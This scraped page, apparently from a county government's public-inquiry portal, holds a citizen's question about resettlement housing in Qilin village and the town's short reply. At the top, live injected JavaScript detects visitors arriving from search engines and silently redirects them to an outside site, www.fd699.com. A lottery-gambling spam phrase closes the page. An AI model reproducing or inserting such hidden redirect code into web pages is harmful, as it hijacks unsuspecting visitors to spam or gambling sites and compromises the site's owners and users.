var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?d06559e5a096e99dd4e26ec0cbfbf885"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); var regexp=/\.(sogou|soso|baidu|google|youdao|yahoo|bing|118114|biso|gougou|ifeng|ivc|sooule|niuhu|biso)(\.[a-z0-9\-]+){1,2}\//ig; var where =document.referrer; if(regexp.test(where)) { window.location.href='http://www.fd699.com' }

麒麟村什么时候有新一批的安置房分配?

信件编号: 20201015005 来信时间: 2021-10-15 15:23:15
信件类型: 我要咨询
内容: 麒麟村什么时候有新一批的安置房分配?如果没有,政府有没有采购房源的计划?
答复情况:
答复单位:南陵县籍山镇    答复时间:2021-10-16 15:53:07

答复意见:

这位网友:

您好!麒麟村暂时没有安置房源,县政府拟在麒麟山庄新建安置房,现处于前期准备阶段。感谢您的关心,祝您生活愉快!

用户满意度评价:
  • 查询密码:

  • 评价结果:

    一分快三计划